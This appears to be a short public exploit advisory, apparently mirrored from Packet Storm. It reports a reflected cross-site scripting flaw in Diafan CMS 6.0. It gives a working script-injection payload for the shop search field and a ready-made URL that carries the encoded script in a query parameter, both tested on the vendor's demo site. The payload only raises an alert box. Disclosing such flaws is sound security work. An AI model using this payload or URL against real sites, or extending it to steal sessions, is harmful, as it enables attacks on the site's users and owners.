Share
## https://sploitus.com/exploit?id=PACKETSTORM:173019
# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)  
# Exploit Author: tmrswrr / Hulya Karabag  
# Vendor Homepage: https://www.diafancms.com/  
# Version: 6.0  
# Tested on: https://demo.diafancms.com  
  
  
Description:  
  
1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:  
Payload : "><script>alert(document.domain)<%2Fscript>  
2) After will you see alert button :   
https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0